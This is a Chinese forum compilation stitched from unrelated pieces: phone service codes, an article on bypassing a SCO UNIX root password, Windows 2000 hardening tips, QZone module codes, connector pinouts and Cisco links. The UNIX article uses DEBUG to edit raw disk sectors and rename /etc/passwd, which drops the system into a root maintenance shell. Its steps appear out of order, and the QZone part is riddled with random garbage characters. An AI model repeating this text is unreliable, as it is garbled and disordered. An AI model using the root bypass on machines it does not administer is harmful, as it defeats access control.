• 　　45ABC＃：读取信道ABC上的信号强度，ABC＝0~124
  
• 　　46＃：显示当前AFC DAC的值
  
• 　　47A＃：设置音量A＝0~7
  
• 　　490＃：读锂电池信息
  
• 　　57＃：清除保留内存，相当于ETACS的32＃指令
  
• 　　58ABCDEF＃：设置保密码为ABCDEF
  
• 　　59ABCD＃：显示/改变解锁码
  
• 　　60＃：显示IMEI（国际移动设备识别码）
  
• 　　65＃：显示IMSI
  
• 　　7100＃：手机自检，03、04为Modem IC错误，05、06为SpeechCode IC错误，07为软件错误必需转移卡，08为手机正常，00、01为CPU错误  
  
• 
  
• 
  
• 
  
• 
  
• 飞利浦手机秘籍
  
• 
  
• 　　◆显示IMEI号：*#06#
  
• 　　◆显示状态行 *#2254*#: C, BS, RR, MMI, CREAT.
  
• 　　◆激活或关闭调试呼叫（DEBUG CALL）模式 *#2255*#
  
• 　　◆显示总通话时间 *#2558*#
  
• 　　◆强迫重新接入网络 *#2562*#
  
• 　　◆显示和更改手机的保密码 *#7489*#
  
• 　　◆显示一些SIM卡信息，例如相位等级（phase level）*#7378*#
  
• 　　◆获取SIM卡锁信息，初始化和标志 *#3377*#
  
• 　　◆激活和关闭睡眠模式 *#7693*#
  
• 　　◆获取睡眠模式信息 *#8463*#
  

        ccwan发表于：  2006-12-22  15:13

对于广大的SCOUNIX操作系统管理员来说，最不可原谅的过失之一就是忘记了 管理员口令（即超级用户口令）。这个过失会导致极其严重的后果，对此凡是具备UNIX 操作系统常识的人都应该知道。然而令人遗憾的是，时至今日铸错者依然大有人在。看 来，对他们固然要责备，但既然问题客观存在，我们就总还须面对现实，想办法去解决才是。

　　长期以来，许多人就超级用户口令被忘记的问题发表了各种看法。一部分人认 为，一旦忘记了超级用户口令，只能重装操作系统，此外别无它法。另一部分人则坚决 反对这种"重装论"，他们提出了一些经过成功实践的解决方案，使得"重装论"者败下阵来。现在我们可以肯定地说，忘记超级用户口令是有办法解决的。

　　但同时我们也不得不承认，现行的解决方案有很大的局限性，这些局限性决定了现有方案无论怎样变化和发展也不可能成为一种有着强大生命力的最彻底的解决方案。

　　传统解决方案的局限性

　　上面已经谈到，目前有多种针对超级用户口令被忘记问题的解决方案。为了叙述上的方便，本文将这些方案统称为传统解决方案。传统方案乍看起来似乎各不相同，但必须有一套（两张）EmergencyBootFloppy（紧急启动软盘）。这套软盘均为文件系统

　　格式，必须在SCOUNIX上制作，并且在不同类型机器上制作的紧急启动软盘相互不能通用。用紧急启动软盘启动后，将硬盘根文件系统mount到某个目录下（一般为/mnt目录），然后进入该目录（即进入硬盘根文件系统的根目录），修改相关目录下与超级用户口令有关的信息（各种方案的不同之处主要体现于此）。最后回到软盘根目录，拆卸/dev/hd0root，重启机器。

　　这些共同点实际上反映了传统方案的局限性：

　　一、操作平台局限性：要求自始至终必须在SCOUNIX操作系统平台上实施。

　　二、操作工具局限性：对紧急启动软盘的依赖性太大。万一软盘发生损毁，必须找一台类型相同的机器再制作一套，这就是前面所说的"专盘专用"的限制。

　　三、操作对象局限性：必须依靠硬盘根文件系统的支持。即操作者与修改对象（指与超级用户口令有关的信息）被文件系统隔开，操作者不能直接修改对象，只能调用文件系统提供的服务修改。这种方式本是信息科学中倡导的层次化思想的一种体现，在

　　正常情况下应予称道；但任何事物都是有两面性的，在非常情况下--诸如解决忘记超级用户口令这一类问题时--该方式反而有可能带来麻烦。

　　三大局限性说明了传统解决方案可行性的脆弱和狭窄，也决定了它们作为凌驾于文件系统之上的高层方案所必然具有的弊端。于是，打破这些局限性，探索出一种全新的解决方案，就成为了摆在一切UNIX研究者面前的新课题。

　 所谓新课题，就是找到一种能够突破传统方案局限性的新方案。究竟从何处下手呢？让我们再来看一看三大局限性。

　　操作平台局限性似乎不好突破，因为其它操作系统识别不了UNIX的文件系统格式。

　　操作工具局限性好象就更难了，因为紧急启动软盘既要在UNIX上制作，又要在UNIX上使用，所以如果操作平台局限性突破不了，它就更突破不了。最后看看操作对象局限性。操作对象完全由文件系统管理，操作者必须通过文件系统访问它们。万一文件系统崩溃，那么即使它下面的文件完好无损，操作者也只能认为这些文件已全部丢失--因为文件系统无法访问（例如mount不上来）。其实这个时候还是有办法找到那些文件的，方法就是直接访问物理硬盘。道理很简单：就本质而言，文件系统只不过是一个构筑于物理硬盘之上的逻辑组织，平时我们是通过它来访问物理硬盘的；现在这个组织寿终正寝，不能再为我们服务了，于是我们只好"自己动手，丰衣足食"。直接访问物理硬盘不但可以使文件"失"而复得，而且还有另外一个重要意义--突破了操作对象局限性。

　　操作对象局限性一旦突破，我们就会惊奇地发现突破另外两大局限性简直可以说是顺理成章了。因为虽然其它操作系统识别不了UNIX的文件系统格式，但在任何操作系统上，我们都可以访问物理硬盘；而只要是带有访问物理硬盘功能的软件，都可以成为我们的操作工具。

　　现在我们要做的仅仅是：找一个大家最熟悉的操作系统和一个最易寻觅的可以访问物理硬盘的软件。

　　大家最熟悉的操作系统无疑是DOS。可以访问物理硬盘的软件很多，但最易寻觅的莫过DEBUG.EXE。所谓最易寻觅，是因为DEBUG是DOS本身的一条外部命令，可以说只要是在安装了DOS的机器上都可以找到它。对DEBUG略知一二的人可能会指出该命令并

　　没有提供访问物理硬盘的选项，但请不要忘记DEBUG是DOS提供给用户的一个汇编语言调试程序，我们完全可以利用它编写、调试和执行一个汇编小程序去访问物理硬盘。应该说，这对一个能够取得系统管理员身份的人并不困难。

　　综上所述，在DOS上运行DEBUG来破除UNIX管理员口令，这就是本文提出的解决SCOUNIX超级用户口令被忘记问题的新方案。 新方案的应用新方案已经提出，下面我们来看看它是如何应用于实践的。

----DA0500H表示第一个数据块地址。由于其它12个数据块地址均为0，所以可断定根目录在硬盘上只占了一个数据块。现在我们必须依据DA0500H计算出这个数据块存放在硬盘的第几柱面、第几磁头、第几扇区。计算公式如下：

　　C=TRUNC(P/(H*S))

　　C1=C0+C

　　H1=TRUNC((P-C*H*S)/S)

　　S1=P-C*H*S-H1*S+1

　　----其中：

　　----C1、H1、S1分别为数据块物理地址柱面号、磁头号、扇区号

　　----P等于数据块地址翻译成十进制数后再乘以2

　　----H为硬盘磁头数

　　----S为每磁头扇区数

　　----C0为根文件系统起始柱面

　　----C只是一个中间量

　　----将DA0500H代入上述公式，并根据H=64，S=32，C0=2，可算出C1=3，H1=29，S1=21。因此根目录在硬盘上的物理地址为：3柱面29头21扇。

　　----用app把它读出来（

　　CX和DX的赋值应分别改为"0315"和"1D80"）。

　　----读出后用"dump"命令查看，可以发现偏移1050H至105FH是/etc目录的i-node号和文件名，其中i-node号为22H，即34D。因为每个扇区有8个i-node，所以34号

　　i-node必定在2柱面0头9扇。

　　----用app读出它（CX和DX的赋值分别改为"0209"和"0080"）。

　　----用"dump"命令可看出偏移1040H至107FH正是/etc目录的i-node。我们把它的数据块也读出来。先计算第一个数据块的物理地址。将2D0700H代入公式，算出/etc第

　　一个数据块物理地址是3柱面50头27扇。

　　----用app读出它（CX和DX的赋值分别改为"031B"和"3280"）。

　　----用"dump"命令可看出偏移11A0H至11AFH是/etc目录下的passwd文件名。我们用"enter"命令把它改成zls，然后再运行app（AX的赋值应改为0301)。

　　----现在退出DEBUG命令。

　　----取出软盘，重启机器，引导UNIX操作系统。

　　----按照引导顺序，UNIX显示出硬件配置信息后就该提问超级用户口令了，但就在此时它却突然发现/etc/passwd文件失踪了！(其实只是被改名为zls，但UNIX对此一无所知。)没有了这个文件，UNIX无法提问超级用户口令，于是它只好在屏幕上显示如下 :

信息并允许用户以系统管理员身份直接进入系统维护态：

　　su:Unknownid:root

　　/etc/tcbck:file/etc/passwd

　　ismissingorzerolength

　　/etc/tcbck:eitherslash(/)ismissingfrom

　　/etc/auth/system/filesortherearemalformedentries

　　in/etc/passwdor/etc/group

　　/etc/smmck:restoremissingfiles

　　frombackupordistribution.

　　INIT:SINGLEUSERMODE

　　****PASSWORDFILEMISSING!****

　　EnteringSystemMaintenanceMode

　　#

　　----进入维护态后，当然就可以"为所欲为"了。但最好先设置一个新的超级用户口令。要想这样做，首先必须恢复passwd文件名。

　　#mv/etc/zls/etc/passwd

　　----然后，就可以用/bin/passwd命令设置新的超级用户口令了。

　　结束语

　　----在本文行将结束时，我们再来作一个小小的总结。

　　----传统方案有操作平台、操作工具和操作对象局限性。新方案则突破了这三大局限性。

　　----一、新方案突破了操作平台局限性。传统方案的操作平台必须是UNIX，而新方案则是DOS。DOS比UNIX普及得多，中国的绝大部分计算机用户对UNIX陌生，但对DOS却相当熟悉，使用起来也有亲切感。

　　----二、新方案突破了操作工具局限性。传统方案的操作工具必须是两张紧急启动软盘，而新方案仅使用一张DOS系统盘，其上只需拷贝一个DEBUG.EXE文件。紧急启动软盘只能专盘专用，DOS系统盘却不存在这个问题--用任何一台机器上的DOS制作出的系

　　统盘，可以用来解决任何一台机器上的UNIX超级用户口令被忘记的问题。至于用来访问物理硬盘的软件，当然更不是非DEBUG不可，任何软件--只要支持访问物理盘--均可。作者推荐使用Norton8.0软件包里的diskedit程序，对不懂汇编语言编程的人来说该程序无疑是一个最好的选择。

　　----三、新方案突破了操作对象局限性。传统方案的操作对象是文件系统管理下的文件，而新方案撇开了文件系统，直接在底层修改数据。

　　----最后需要说明的是，对于SCOOpenServerRelease5，因条件所限，作者还没有使用过，所以关于新方案在该版本上执行时步骤是否需要修改以及如何修改的问题，如果有机会，作者会加以适当的补充。

首先需要指出，由于文章篇幅和性质的限制，本文不可能将新方案实施过程中涉及到的所有知识以"入门讲座"的方式加以介绍。因此，在阅读本小节前，读者应具备下列基础：熟悉硬盘主引导扇区和UNIX分区及UNIX文件系统的构造（这对UNIX系统管理员来说不成问题）、了解中断13H入口参数含义、使用过DEBUG命令。一台COMPAQDESKPROXL/466服务器，主板内含PCISCSI-2控制器一个，上接富士通硬盘一只，该硬盘主要参数为：1041柱面，64头，32扇。硬盘上装有SCOUNIXSystemV/386Release3.2operatingsystemVersion4.2。现在假设其超级用户口令被忘记。首先，随便找一台安装了DOS的计算机，制作一张DOS系统盘，并在系统盘上拷贝一个DEBUG.EXE文件。

　　C:\DOS>format/sa:

　　C:\DOS>copydebug.exea:

　　----然后将该盘插入COMPAQ服务器A驱，开机启动DOS操作系统，执行DEBUG命令。

　　A:\>debug

　　现在我们就编写一段汇编语言程序（以下简称app），来读出硬盘0柱0头1扇区的内容。该扇区存放的是主引导记录，读出它是为了确定SCOUNIX分区的起始位置。app是调用中断13H实现的，以后我们还要反复用到它，当然入口参数将随所读内容物理地址的变化而变化。

　　-a

　　2039:0100MOVAX,0201

　　2039:0103MOVBX,1000

　　2039:0106MOVCX,0001

　　2039:0109MOVDX,0080

　　2039:010CINT13

　　2039:010EINT20

　　2039:0110

　　-g

　　Programterminatednormally

　　现在我们可以用"dump"命令查看被读到内存里的扇区内容。从偏移11BEH处开始是分区表，其中类型标志字节为63H的分区是SCOUNIX分区。该分区起始于1柱面0磁头1扇。

　　下面，读出UNIX根文件系统i-node表的第一个扇区，以确定根目录的物理位置。

　　根据UNIX分区起始位置可知根文件系统始于2柱0头1扇。并且，由于2柱0头1扇是引导块，2扇是超级块，3、4扇为间隔，所以i-node表必定始于第5扇。

　　我们用app读出它（CX的赋值应改为"0205"）。

　　读出后用"dump"命令查看偏移1040H至107FH的64个字节，这就是2号i-node，即根目录的i-node。

　　----下面我们就根据i-node计算根目录在硬盘上的物理地址。

　　----我们从偏移1040H看起：

　　----ED41H表示文件类型与存取权限为"drwxr-xr-x"；

　　----1000H表示文件连结数为16；

　　----0000H表示文件属主ID为0；

　　----0200H表示文件组ID为2；

　　----80020000H表示文件字节数为640个；

1、禁止IPC空连接

Cracker可以利用net use命令建立空连接，进而入侵，还有net view，nbtstat这些都是基于空连接的，禁止空连接就好了。打开注册表，找到Local_Machine\System\
CurrentControlSet\Control\
LSA-RestrictAnonymous 把这个值改成”1”即可。

2、禁止At命令

Cracker往往给你个木马然后让它运行，这时他就需要at命令了。打开管理工具-服务，禁用task scheduler服务即可。

3、关闭超级终端服务

如果你开了的话，这个漏洞都烂了，我不说了。

4、关闭SSDP Discover Service服务

这个服务主要用于启动家庭网络设备上的UPnP设备，服务同时会启动5000端口。可能造成DDOS攻击，让CPU使用达到100%，从而使计算机崩溃。照理说没人会对个人机器费力去做DDOS，但这个使用过程中也非常的占用带宽，它会不断的向外界发送数据包，影响网络传输速率，所以还是关了好。

5、关闭Remote Regisry服务

看看就知道了，允许远程修改注册表？除非你真的脑子进水了。

6、禁用TCP/IP上的NetBIOS

网上邻居-属性-本地连接-属性-Internet协议（TCP/IP）属性-高级-WINS面板-NetBIOS设置-禁用TCP/IP上的NetBIOS。这样Cracker就无法用nbtstat命令来读取你的NetBIOS信息和网卡MAC地址了。

7、关闭DCOM服务

这就是135端口了，除了被用做查询服务外，它还可能引起直接的攻击，关闭方法是：在运行里输入dcomcnfg，在弹出的组件服务窗口里选择默认属性标签，取消“在此计算机上启用分布式COM”即可。

8、把共享文件的权限从“everyone”组改成“授权用户”

“everyone” 在win2000中意味着任何有权进入你的网络的用户都能够获得这些共享资料。任何时候都不要把共享文件的用户设置成“everyone”组。包括打印共享，默认的属性就是“everyone”组的，一定不要忘了改。

9、取消其他不必要的服务

请根据自己需要自行决定，下面给出HTTP/FTP服务器需要最少的服务作为参考：

l Event Log
            l License Logging Service
            l Windows NTLM Security Support Provider
            l Remote Procedure Call (RPC) Service
            l Windows NT Server or Windows NT Workstation
            l IIS Admin Service
            l MSDTC
            l World Wide Web Publishing Service
                  l Protected Storage

10、更改TTL值

Cracker可以根据ping回的TTL值来大致判断你的操作系统，如：

TTL=107(WINNT);
            TTL=108(win2000);
            TTL=127或128(win9x);
            TTL=240或241(linux);
            TTL=252(solaris);
                  TTL=240(Irix);

实际上你可以自己更改的：HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\
Parameters：DefaultTTL REG_DWORD 0-0xff(0-255 十进制,默认值128)改成一个莫名其妙的数字如258，起码让那些小菜鸟晕上半天，就此放弃入侵你也不一定哦。

11、账户安全

首先禁止一切账户，除了你自己，呵呵。然后把Administrator改名。我呢就顺手又建了个Administrator账户，不过是什么权限都没有的那种，然后打开记事本，一阵乱敲，复制，粘贴到“密码”里去，呵呵，来破密码吧！破完了才发现是个低级账户，看你崩溃不？

12、取消显示最后登录用户

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\Current Version\
Winlogon：DontDisplayLastUserName把值改为1。

13、删除默认共享

有人问过我一开机就共享所有盘，改回来以后，重启又变成了共享是怎么回事，这是2K为管理而设置的默认共享，必须通过修改注册表的方式取消它：
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\
Parameters：AutoShareServer类型是REG_DWORD把值改为0即可。

14、禁用LanManager 身份验证

Windows NT Servers Service Pack 4 和后续的版本都支持三种不同的身份验证方法： LanManager (LM) 身份验证；Windows NT(也叫NTLM)身份验证；Windows NT Version 2.0 (也叫NTLM2) 身份验证；

默认的情况下，当一个客户尝试连接一台同时支持LM 和 NTLM 身份验证方法的服务器时，LM 身份验证会优先被使用。所以建议禁止LM 身份验证方法。

1. 打开注册表编辑器；

2. 定位到 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa；

3. 选择菜单“编辑”，“添加数值”；

4. 数值名称中输入：LMCompatibilityLevel ，数值类型为：DWORD，单击 确定；

5. 双击新建的数据，并根据具体情况设置以下值：

0 - 发送 LM 和 NTLM响应；

1 - 发送 LM 和 NTLM响应；

2 - 仅发送 NTLM响应；

3 - 仅发送 NTLMv2响应；(Windows 2000有效)

4 - 仅发送 NTLMv2响应，拒绝 LM；(Windows 2000有效)

5 - 仅发送 NTLMv2响应，拒绝 LM 和 NTLM；(Windows 2000有效)

6. 关闭注册表编辑器；

7. 重新启动机器。

所有代码都是通过腾讯考核才能用

举例博墅（Boke Show）k]EX:}TG$Z\
http://script.qzone.qq.com/swf/lwb.swf
^8m?*}1q Ch!xGuest这是腾讯的地址博墅（Boke Show）}nRsduqn/k g*f]
可用的代码只有内侧才能用

1.在自定义里面新建模块博墅（Boke Show）OYBKW u@r
2.模块名称里填入@LF(ldh),[说明:@LF(ldh)就是作品的代码,每个作品都会不同]写名称的时候去掉双引号，注意名称的大小写（错一个都不行！），括号里的数字可以改，可以是字母，具体有什么规律还待研究，现在知道的有：。
V aj;kS5P BN$R$KGuest3.新建的模块类型为“图文模块”，这里是成功与否的关键！！（其它模块我都试过了，一律不行！）
'Px,Ic&Zs:yGuest4.提交成功之后，接下来就要在“评论内容”里面再输入@API_zIndex(1)和@API_Alpha(85)（双引号不用输），其中85是透明值，可以在0-100之间随意选择。其他都不用填写啦，哈哈
a t5R3kC OGuest5.点击保存。
s
l TO"w1kvtGuestOK了~~刷一下，看看是不是出现效果了？哈哈~~~
h8Zjh/b7b^Guest再罗嗦一下，如果要取消这个效果，只要在模块管理里把那个模块的勾去掉就好了，可能有些flash会把自定义挡住，连ctrl+j的快捷键都不好用，建议大家从qzone.qq.com以安全模式登录（输入QQ号码、密码后，在“安全模式”上打勾，然后选择进入自己的空间）就可以了。如果要换其它的flash用，创建好新的模块以后，要记得进模块管理看一下，确认你刚才创建的模块是勾上的，原来创建的勾要取消，就行了。
3p#kNl{YU3m,Hc2?Guest还有一款一样加上去
5O
Bt0e,k)SGuest@LF(wbsnxydnr)   说明:加在新建模板的名称处.也就是新建模板名称博墅（Boke Show）ecE v_cr-_ C*s
@API_zIndex(1)博墅（Boke Show）0Bo%kc m/_
a
@API_Alpha(70)   这两个一块加在评论处.

刘德华全站

调用代码:
'}^7b
b ES0H USu'qGuest@LF(ldh)     说明:加在新建模板的名称处.也就是新建模板名称
2j)we:s4{\!y:]+@PGuest@API_zIndex(1)
.jT,dJ6t/C6mU FWGuest@API_Alpha(70)     这两个一块加在评论处.博墅（Boke Show）"a` Nml/O+Y)M

【血玫瑰博墅（Boke Show）q8A'oakx/ZR
调用代码:
F+k#a(b8v/\+yGuest@LF(lwb)   说明:加在新建模板的名称处.也就是新建模板名称博墅（Boke Show）Z)k K;xGh6K
@API_zIndex(1)博墅（Boke Show）{0J _3e2]g
@API_Alpha(70)     这两个一块加在评论处.博墅（Boke Show）:T M)h%dJ+|

#@U0F1vS;Jg`Q)JGuest调用代码:
j;]aZ~[:PGuest@LF(dongman)   说明:加在新建模板的名称处.也就是新建模板名称
+C!z!};bx9]!Y:YGuest@API_zIndex(1)博墅（Boke Show）v!T2^"F6nT
@API_Alpha(70)     这两个一块加在评论处.
O)A7@$mztlE AGuest

调用代码:博墅（Boke Show）,@n"zwh!sHuv7b
@LF(wbsnxydnr)     说明:加在新建模板的名称处.也就是新建模板名称博墅（Boke Show）F P!X:d ukO
@API_zIndex(1)博墅（Boke Show）7L(Y(s]+U e
@API_Alpha(70)     这两个一块加在评论处.博墅（Boke Show）^Ran0T? K
博墅（Boke Show）X!R~ \R-q#{T
【血色的记忆】

调用代码:博墅（Boke Show）6k
Lp)gCy
@LF(king)   说明:加在新建模板的名称处.也就是新建模板名称博墅（Boke Show）x-d-Ug2Z1jP
@API_zIndex(1)
}5s+} [!qfGuest@API_Alpha(70)     这两个一块加在评论处.
8ALV%`4lv~Guest:

名：@LF(fmbl)博墅（Boke Show）Z+j
O}u;K9@J9`9}
评论内容：@API_zIndex(1)@API_Alpha(85)

效果。http://script.qzone.qq.com/swf/fmbl.swf博墅（Boke Show） aW/kox+mZ(V.J)\
Flash: http://script.qzone.qq.com/swf/fmbl.swf

有的可能还不够....希望原谅...

RJ45接口信号定义，以及网线连接头信号安排

以太网 10/100Base-T 接口:
Pin Name Description
1 TX+ Tranceive Data+ (发信号+)
2 TX- Tranceive Data- (发信号-)
3 RX+ Receive Data+ (收信号+)
4 n/c Not connected (空脚)
5 n/c Not connected (空脚)
6 RX- Receive Data- (收信号-)
7 n/c Not connected (空脚)
8 n/c Not connected (空脚)

以太网 100Base-T4 接口:
Pin Name Description
1 TX_D1+ Tranceive Data+
2 TX_D1- Tranceive Data-
3 RX_D2+ Receive Data+
4 BI_D3+ Bi-directional Data+
5 BI_D3- Bi-directional Data-
6 RX_D2- Receive Data-
7 BI_D4+ Bi-directional Data+
8 BI_D4- Bi-directional Data-

1 white/orange
2 orange/white
3 white/green
4 blue/white
5 white/blue
6 green/white
7 white/brown
8 brown/white

注：RJ45接口采用差分传输方式，tx+、tx-是一对双绞线，拧在一起可以减少干扰。

RS-232接口引脚定义

RS-232接口又称之为RS-232口、串口、异步口或一个COM（通信）口，严格地讲RS-232接口是DTE（数据终端设备）和DCE（数据通信设备）之间的一个接口，DTE包括计算机、终端、串口打印机等设备。DCE通常只有调制解调器（MODEM）和某些交换机COM口是DCE。标准指出DTE应该拥有一个插头（针输出），DCE拥有一个插座（孔输出）。

串口、并口接口定义

并行口与串行口的区别是交换信息的方式不同，并行口能同时通过8条数据线传输信息，一次传输一个字节；而串行口只能用1条线传输一位数据，每次传输一个字节的一位。并行口由于同时传输更多的信息，速度明显高于串行口，但串行口可以用于比并行口更远距离的数据传输。

1、25针并行口插口的针脚功能：

　　　 针脚 功能 针脚 功能

　　1 选通 (STROBE低电平) 10 确认 (ACKNLG低电平)

　　2 数据位0 (DATAO) 11 忙 (BUSY)

　　3 数据位1 (DATA1) 12 却纸 (PE)

　　4 数据位2 (DATA2) 13 选择 (SLCT)

　　5 数据位3 (DATA3) 14 自动换行 (AUTOFEED低电平)

　　6 数据位4 (DATA4) 15 错误观点(ERROR低电平)

　　7 数据位5 (DATA5) 16 初始化成(INIT低电平)

　　8 数据位6 (DATA6) 17 选择输入 (SLCTIN低电平)

　　9 数据位7 (DATA7) 18-25 地线路(GND)

　　2.串行口的典型代表是RS-232C及其兼容插口，有9针和25针两类。25针串行口具有20mA电流环接口功能，用9、11、18、25针来实现。其针脚功能如下：

　　针脚 功能 针脚 功能

　　1 未用

　　2 发出数据(TXD) 11 数据发送(一)

　　3 接受数据(RXD) 12-17 未用

　　4 请求发送(RTS) 18 数据接收(+)

　　5 清除发送(CTS) 19 未用

　　6 数据准备好(DSR) 20 数据终端准备好比(DTR)

　　7 信号地线路 (SG) 21 未用

　　8 载波检测 (DCD) 22 振铃指示精神 (RI)

　　9 发送返回(+) 23-24 未用

　　10 未用 25 接收返回(一)

　　9针串行口的针脚功能：

　　针脚 功能 针脚 功能

　　1 载波检测(DCD) 6 数据准备好(DSR)

　　2 接受数据(RXD) 7 请求发送(RTS)

　　3 发出数据(TXD) 8 清除发送(CTS)

　　4 数据终端准备好(DTR) 9 振铃指示(RI)

　　5 信号地线(SG)

v35接口管脚说明

管脚    管脚名称对应的34针标准    插座管脚编号
编号
1           保护地                          A
7           信号地                          B
2           发数据                         A P
14         发数据                         B S
3           收数据                         A R
16         收数据                         B T
4           请求发送                        C
5           清零发送                        D
6           DCE准备好                      E
20         DTE准备好                      H
8           数据载波检测到                  F
24        发送时钟A(来自DTE)                    120Ω RJ-45 插针定义（e1接口）

管脚标号  功能定义 信号方向
1          TX+（发送数据正）  输出
2         TX-（发送数据负） 输出  
3          RX+（接收数据正） 输入  
4          NC（空）  
5          NC（空）  
6          RX-（接收数据负）  输入
7         GND（地）  
8          NC（空） 
 U
11        发送时钟B(来自DTE)                    W
15        发送时钟A(来自DCE)                    Y
12        发送时钟B(来自DCE)                    AA
17        接收时钟A(来自DCE)                     V
9          接收时钟B(来自DCE)                     X

V.35 Interface Straight-Through Cable

V.35 Crossover Cable Signal Diagram

V.35 Connector Pin Assignments

9转25针转接头

Cisco-控制台和AUX端口电缆指南

终端连接的控制台端口设置
在您将终端连接到控制台端口之前，您需要配置终端来同路由器控制台端口匹配：

9600 波特
8 数据位
无奇偶
2 个停止位（9600 8N2）或者1个停止位*
*取决于路由器
控制台和AUX接头类型
如下表所示， Cisco 路由器具有三类控制台和AUX接头

RJ-45
DB-25 DCE
DB-25 DTE
有三类RJ－45－to－DB－25接头：DCE类型（调制解调器）、DTE类型以及DCE类型（非调制解调器）。每个都有不同的功用。一般来说，DTE用于终端，DCE（调制解调器）用于调制解调器，而DCE（非调制解调器）则已经过时。

注： 将针6移到针8，您就可以将DCE类型（非调制解调器）改为DCE类型（调制解调器）。

全文详见：
http://www.net130.com/2004/9-15/163119.html

很多都是不错的 不懂的跟着里面的学....我信你们行的......我也是一个新的学者,有很多的地方还是不懂的.....有机会的大家讨论......网络爱好群:20958166  欢迎大家的到来.......

1。配置PIX双机failover的要点
http://bbs.chinaunix.net/forum/viewtopic.php?t=332020&show_type=new

2。10M接口做Trunk
http://bbs.chinaunix.net/forum/viewtopic.php?t=342953&show_type=new

3。Cisco How To Configure InterVLAN Routing on Layer 3 Switches
http://www.net130.com/tutorial/cisco-pdf/howto_L3_intervlanrouting.pdf

4。PPPoE Server
http://bbs.chinaunix.net/forum/viewtopic.php?t=287164&show_type=new

5。6509配置例子
http://www.chinaunix.net/forum/viewtopic.php?t=16300&show_type=new

6。Cisco路由器存储器及IOS升级
http://www.chinaunix.net/forum/viewtopic.php?t=16256&show_type=new

7。用两种方式实现基于源地址的策略路由
http://bbs.chinaunix.net/forum/viewtopic.php?t=199812&show_type=new

8。虚拟局域网（VLAN）路由--catalyst5500实例
http://bbs.chinaunix.net/forum/viewtopic.php?t=1640&show_type=new


9。CISCO路由器产品配置手册二--PSDN
http://www.chinaunix.net/forum/viewtopic.php?t=1705&show_type=new

10。Cisco2620路由器的配置与维护
http://bbs.chinaunix.net/forum/viewtopic.php?t=16244&show_type=new

11。CISCO7400做PPPOE SERVER
http://bbs.chinaunix.net/forum/viewtopic.php?t=352856&show_type=new

12。把linux设置成cisco路由器的日志服务器
http://bbs.chinaunix.net/forum/viewtopic.php?t=288161&show_type=new

13。在PC上装Cisco PIX OS
http://bbs.chinaunix.net/forum/viewtopic.php?t=409469&show_type=new

14。最简单的VPN登入PIX
http://bbs.chinaunix.net/forum/viewtopic.php?t=392903&show_type=new

15。2501做pppoe 虚拟拨号
http://bbs.chinaunix.net/forum/viewtopic.php?t=285760&show_type=new

16。Catalyst 4000 Family Software Configuration Guide, 6.1
http://www.cisco.com/en/US/products/hw/switches/ps663/products_configuration_guide_book09186a00800915bb.html


17。Catalyst 2900-3500 软件配置手册
http://www.net130.com/tutorial/cisco-px/Catalyst%202900-3500.pdf

18. 把linux配置为PIX、cisco、huawei的日志服务主机
http://bbs.chinaunix.net/forum/viewtopic.php?t=416788&show_type=new